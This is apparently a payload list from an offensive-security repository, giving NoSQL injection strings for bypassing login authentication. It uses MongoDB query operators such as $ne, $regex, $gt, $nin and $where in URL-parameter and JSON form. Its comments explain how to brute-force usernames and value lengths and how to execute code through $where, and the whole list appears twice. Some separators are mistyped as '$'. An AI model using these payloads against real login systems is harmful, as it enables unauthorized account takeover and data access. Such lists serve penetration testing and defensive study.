rootsploit/NoSQLi-login-bypass.txt

## NoSQLi-login-bypass.txt
Bypass with Operator:
username[$ne]=1$password[$ne]=1 #<Not Equals>
username[$regex]=^adm$password[$ne]=1 #Check a <regular expression>, could be used to brute-force a parameter
username[$regex]=.{25}&pass[$ne]=1 #Use the <regex> to find the length of a value
username[$eq]=admin$password[$ne]=1 #<Equals>
username[$ne]=admin&pass[$lt]=s #<Less than>, Brute-force pass[$lt] to find more users
username[$ne]=admin&pass[$gt]=s #<Greater Than>
username[$nin][admin]=admin&username[$nin][test]=test&pass[$ne]=7 #<Matches non of the values of the array> (not test and not admin)
{ $where: "this.credits == this.debits" }#<IF>, can be used to execute code

Bypass with Not Equal Operator
#in URL
username[$ne]=toto&password[$ne]=toto
username[$exists]=true&password[$exists]=true

#in JSON
{"username": {"$ne": null}, "password": {"$ne": null} }
{"username": {"$ne": "foo"}, "password": {"$ne": "bar"} }
{"username": {"$gt": undefined}, "password": {"$gt": undefined} }
	Bypass with Operator:
	username[$ne]=1$password[$ne]=1 #<Not Equals>
	username[$regex]=^adm$password[$ne]=1 #Check a <regular expression>, could be used to brute-force a parameter
	username[$regex]=.{25}&pass[$ne]=1 #Use the <regex> to find the length of a value
	username[$eq]=admin$password[$ne]=1 #<Equals>
	username[$ne]=admin&pass[$lt]=s #<Less than>, Brute-force pass[$lt] to find more users
	username[$ne]=admin&pass[$gt]=s #<Greater Than>
	username[$nin][admin]=admin&username[$nin][test]=test&pass[$ne]=7 #<Matches non of the values of the array> (not test and not admin)
	{ $where: "this.credits == this.debits" }#<IF>, can be used to execute code

	Bypass with Not Equal Operator
	#in URL
	username[$ne]=toto&password[$ne]=toto
	username[$exists]=true&password[$exists]=true

	#in JSON
	{"username": {"$ne": null}, "password": {"$ne": null} }
	{"username": {"$ne": "foo"}, "password": {"$ne": "bar"} }
	{"username": {"$gt": undefined}, "password": {"$gt": undefined} }